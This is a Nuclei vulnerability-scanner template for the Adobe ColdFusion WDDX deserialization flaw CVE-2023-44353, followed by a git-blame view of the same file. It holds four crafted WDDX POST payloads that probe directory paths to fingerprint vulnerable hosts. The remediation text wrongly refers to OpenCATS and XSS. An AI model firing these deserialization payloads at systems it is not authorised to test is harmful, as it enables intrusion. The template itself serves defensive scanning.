nuclei-templates/http/cves/2023/CVE-2023-44353.yaml

id: CVE-2023-44353

info:
  name: Adobe ColdFusion WDDX Deserialization Gadgets
  author: salts
  severity: critical
  description: |
    Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.
  remediation: |
    To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-44353
    - https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
    - https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py
    - https://github.com/JC175/CVE-2023-44353-Nuclei-Template
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-44353
    cwe-id: CWE-502
    epss-score: 0.00412
    epss-percentile: 0.73869
    cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: adobe
    product: coldfusion
    shodan-query:
      - http.component:"Adobe ColdFusion"
      - http.component:"adobe coldfusion"
      - http.title:"coldfusion administrator login"
      - cpe:"cpe:2.3:a:adobe:coldfusion"
    fofa-query:
      - title="coldfusion administrator login"
      - app="adobe-coldfusion"
    google-query: intitle:"coldfusion administrator login"
  tags: cve2023,cve,adobe,coldfusion,deserialization,xss
variables:
  windows_known_path: "C:\\Windows\\"
  windows_bad_path: "C:\\Thisdefinitelydoesnotexist\\"
  linux_known_path: "/etc/"
  linux_bad_path: "/thesecretcowlevelisreal/"

http:
  - raw:
      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>

      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>

      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>

      - |
        POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>

    matchers-condition: or
    matchers:
      - type: dsl
        name: windows
        dsl:
          - "status_code_1 == 500 && status_code_2 == 404"
          - contains(body_1, "coldfusion.runtime")
        condition: and

      - type: dsl
        name: linux
        dsl:
          - "status_code_3 == 500 && status_code_4 == 404"
          - contains(body_3, "coldfusion.runtime")
        condition: and
# digest: 490a00463044022016552548b902a20941bf3b8f74c6bb4168571b335e98fde72738a6b91f4bf39f02200c0098761471880e51ff1a9325790c071def7853d7c548302d5bb84f5178d7ff:922c64590222798bb761d5b6d8e72950
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`id: CVE-2023-44353`

			`info:`
matcher & path update 2024-01-06 20:24:38 +00:00			`name: Adobe ColdFusion WDDX Deserialization Gadgets`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`author: salts`
			`severity: critical`
			`description: \|`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.`
matcher & path update 2024-01-06 20:24:38 +00:00			`remediation: \|`
			`To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`reference:`
matcher & path update 2024-01-06 20:24:38 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2023-44353`
			`- https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`- https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py`
product/queries updated 2024-05-31 19:23:20 +00:00			`- https://github.com/JC175/CVE-2023-44353-Nuclei-Template`
			`- https://github.com/nomi-sec/PoC-in-GitHub`
matcher & path update 2024-01-06 20:24:38 +00:00			`classification:`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`cvss-score: 9.8`
matcher & path update 2024-01-06 20:24:38 +00:00			`cve-id: CVE-2023-44353`
			`cwe-id: CWE-502`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-score: 0.00412`
			`epss-percentile: 0.73869`
matcher & path update 2024-01-06 20:24:38 +00:00			`cpe: cpe:2.3:a:adobe:coldfusion::::::::`
			`metadata:`
			`verified: true`
			`max-request: 4`
			`vendor: adobe`
			`product: coldfusion`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`shodan-query:`
			`- http.component:"Adobe ColdFusion"`
			`- http.component:"adobe coldfusion"`
			`- http.title:"coldfusion administrator login"`
			`- cpe:"cpe:2.3:a:adobe:coldfusion"`
			`fofa-query:`
			`- title="coldfusion administrator login"`
			`- app="adobe-coldfusion"`
product/queries updated 2024-05-31 19:23:20 +00:00			`google-query: intitle:"coldfusion administrator login"`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2023,cve,adobe,coldfusion,deserialization,xss`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`variables:`
			`windows_known_path: "C:\\Windows\\"`
			`windows_bad_path: "C:\\Thisdefinitelydoesnotexist\\"`
trailspace fix 2024-01-06 20:27:54 +00:00			`linux_known_path: "/etc/"`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`linux_bad_path: "/thesecretcowlevelisreal/"`
matcher & path update 2024-01-06 20:24:38 +00:00
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`http:`
			`- raw:`
			`- \|`
added the endpoint in the request 2024-01-08 07:13:17 +00:00			`POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1`
trailspace fix 2024-01-06 20:27:54 +00:00			`Host: {{Hostname}}`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`Content-Type: application/x-www-form-urlencoded`
content-type fix 2024-01-06 20:30:12 +00:00
matcher & path update 2024-01-06 20:24:38 +00:00			`argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00
			`- \|`
added the endpoint in the request 2024-01-08 07:13:17 +00:00			`POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1`
trailspace fix 2024-01-06 20:27:54 +00:00			`Host: {{Hostname}}`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`Content-Type: application/x-www-form-urlencoded`
content-type fix 2024-01-06 20:30:12 +00:00
matcher & path update 2024-01-06 20:24:38 +00:00			`argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>`

Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`- \|`
added the endpoint in the request 2024-01-08 07:13:17 +00:00			`POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1`
trailspace fix 2024-01-06 20:27:54 +00:00			`Host: {{Hostname}}`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`Content-Type: application/x-www-form-urlencoded`
matcher & path update 2024-01-06 20:24:38 +00:00
			`argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00
			`- \|`
added the endpoint in the request 2024-01-08 07:13:17 +00:00			`POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1`
trailspace fix 2024-01-06 20:27:54 +00:00			`Host: {{Hostname}}`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`Content-Type: application/x-www-form-urlencoded`

matcher & path update 2024-01-06 20:24:38 +00:00			`argumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>`

Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00			`matchers-condition: or`
			`matchers:`
			`- type: dsl`
matcher & path update 2024-01-06 20:24:38 +00:00			`name: windows`
trailspace fix 2024-01-06 20:27:54 +00:00			`dsl:`
matcher & path update 2024-01-06 20:24:38 +00:00			`- "status_code_1 == 500 && status_code_2 == 404"`
			`- contains(body_1, "coldfusion.runtime")`
			`condition: and`
Create CVE-2023-44353-with-CVE-2023-26347 Add combination Auth Bypass + RCE via CVE-2023-44353 and CVE-2023-26347 2023-11-22 16:48:59 +00:00
			`- type: dsl`
matcher & path update 2024-01-06 20:24:38 +00:00			`name: linux`
trailspace fix 2024-01-06 20:27:54 +00:00			`dsl:`
matcher & path update 2024-01-06 20:24:38 +00:00			`- "status_code_3 == 500 && status_code_4 == 404"`
			`- contains(body_3, "coldfusion.runtime")`
			`condition: and`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 490a00463044022016552548b902a20941bf3b8f74c6bb4168571b335e98fde72738a6b91f4bf39f02200c0098761471880e51ff1a9325790c071def7853d7c548302d5bb84f5178d7ff:922c64590222798bb761d5b6d8e72950`